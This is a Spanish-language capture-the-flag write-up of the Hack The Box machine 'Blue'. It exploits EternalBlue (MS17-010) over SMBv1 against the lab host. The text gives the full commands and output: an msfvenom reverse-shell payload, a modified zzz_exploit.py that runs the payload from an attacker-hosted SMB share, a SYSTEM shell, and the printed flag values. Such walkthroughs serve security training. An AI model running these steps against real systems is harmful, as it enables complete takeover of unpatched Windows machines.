Blue
7 minutos de lectura
Hack The Box. Windows. Máquina fácil. Esta máquina expone SMB versión 1, siendo vulnerable a EternalBlue. Una vez que el exploit está completado, tenemos acceso como Administrator
- SO: Windows
- Dificultad: Fácil
- Dirección IP: 10.10.10.40
- Fecha: 28 / 07 / 2017
Escaneo de puertos
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.40 -p 135,139,445,49152,49153,49154,49155,49156,49157
Nmap scan report for 10.10.10.40
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date:
|_ start_date:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.62 seconds
La máquina tiene abiertos los puertos 135 (MS-RPC), 139 y 445 (SMB), entre otros.
$ crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
Enumeración
Al mirar la versión de SMB (SMBv1), sin firma, descubrimos que podemos efectuar un ataque conocido como EternalBlue (CVE-2017-0144). Además, el nombre de la máquina (Blue) es una pista.
Podemos listar algunos recursos compartidos por SMB con una sesión nula:
$ smbclient -L 10.10.10.40 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Vamos a lanzar el ataque EternalBlue con MS17-010. Para ello, tenemos que usar Python versión 2.7. La mejor manera es en un contenedor Docker:
$ docker run -v "$(pwd):/opt" -it python:2.7 bash
root@2955c01b9358:/# cd /opt
root@2955c01b9358:/opt# cd MS17-010/
root@2955c01b9358:/opt/MS17-010# ls -la
total 204
drwxr-xr-x 22 root root 704 Jul 15 13:26 .
drwxr-xr-x 3 root root 96 Jul 15 13:26 ..
drwxr-xr-x 12 root root 384 Jul 15 13:26 .git
-rw-r--r-- 1 root root 27786 Jul 15 13:26 BUG.txt
-rw-r--r-- 1 root root 3367 Jul 15 13:26 README.md
-rw-r--r-- 1 root root 2495 Jul 15 13:26 checker.py
-rw-r--r-- 1 root root 25722 Jul 15 13:26 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24079 Jul 15 13:26 eternalblue_exploit8.py
-rw-r--r-- 1 root root 3804 Jul 15 13:26 eternalblue_poc.py
-rw-r--r-- 1 root root 1544 Jul 15 13:26 eternalchampion_leak.py
-rw-r--r-- 1 root root 2591 Jul 15 13:26 eternalchampion_poc.py
-rw-r--r-- 1 root root 5936 Jul 15 13:26 eternalchampion_poc2.py
-rw-r--r-- 1 root root 1651 Jul 15 13:26 eternalromance_leak.py
-rw-r--r-- 1 root root 948 Jul 15 13:26 eternalromance_poc.py
-rw-r--r-- 1 root root 5107 Jul 15 13:26 eternalromance_poc2.py
-rw-r--r-- 1 root root 1865 Jul 15 13:26 eternalsynergy_leak.py
-rw-r--r-- 1 root root 3022 Jul 15 13:26 eternalsynergy_poc.py
-rw-r--r-- 1 root root 1110 Jul 15 13:26 infoleak_uninit.py
-rw-r--r-- 1 root root 16669 Jul 15 13:26 mysmb.py
-rw-r--r-- 1 root root 1846 Jul 15 13:26 npp_control.py
drwxr-xr-x 5 root root 160 Jul 15 13:26 shellcode
-rw-r--r-- 1 root root 43417 Jul 15 13:26 zzz_exploit.py
Tenemos que instalar impacket (pip install impacket). Luego, podemos comprobar que la máquina es vulnerable con checker.py:
root@2955c01b9358:/opt/MS17-010# python checker.py
checker.py <ip>
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
No parece vulnerable. Pero vamos a poner guest como nombre de usuario (necesitamos modificar el script):
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
Genial, mucho mejor.
Explotación de SMB
En este punto, podemos usar zzz_exploit.py para comprometer la máquina (tenemos que poner guest como usuario otra vez):
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py
zzz_exploit.py <<p> [pipe_name]
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008391048
InParam: 0xfffff8a00870115c
MID: 0x802
unexpected alignment, diff: 0x-370fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008635048
InParam: 0xfffff8a00872a15c
MID: 0x807
unexpected alignment, diff: 0x-f5fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087a5088
InParam: 0xfffff8a00873e15c
MID: 0x903
unexpected alignment, diff: 0x66088
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087b3088
InParam: 0xfffff8a0087ad15c
MID: 0x903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done
Perfecto, ha funcionado. Pero solamente ha creado un archivo C:\pwned.txt. Para conseguir ejecución remota de comandos (RCE), podemos exponer un binario malicioso mediante un servidor SMB y ejecutarlo:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o pwn.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: pwn.exe
Ahora tenemos que modificar un poco el exploit. En concreto, esta función tiene que quedar así:
def service_exec(a, v):
pass
def smb_pwn(conn, arch):
#smbConn = conn.get_smbconnection()
#print('creating file c:\\pwned.txt on the target')
#tid2 = smbConn.connectTree('C$')
#fid2 = smbConn.createFile(tid2, '/pwned.txt')
#smbConn.closeFile(tid2, fid2)
#smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c \\10.10.17.44\smbFolder\pwn.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
Entonces, iniciamos el servidor SMB con smbserver.py (Impacket) y ejecutamos el exploit. Si no funciona, podemos usar una de las pipes listadas con checker.py (samr, lsarpc, browser…):
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0080cc048
InParam: 0xfffff8a00872a15c
MID: 0x3803
unexpected alignment, diff: 0x-65efb8
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087b2088
InParam: 0xfffff8a0087a515c
MID: 0x3903
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087d2088
InParam: 0xfffff8a0087cc15c
MID: 0x3903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service zVPI.....
Starting service zVPI.....
The NETBIOS connection with the remote host timed out.
Removing service zVPI.....
ServiceExec Error on: 10.10.10.40
Unexpected answer from server: Got 46, Expected 47
Done
Recibimos una conexión en el servidor SMB:
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.40,49197)
[*] AUTHENTICATE_MESSAGE (\,HARIS-PC)
[*] User HARIS-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109
Y el binario pwn.exe se ejecuta y obtenemos una shell como nt authority\system:
$ rlwrap ncat -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49198.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
En este punto, podemos leer ambas flags user.txt y root.txt:
C:\Windows\system32>dir C:\Users
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,691,747,840 bytes free
C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
bb50fc9a421df6dc53a95fd7a5c4bfe6
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
fd999003d610c8fe77d56868651ba5d3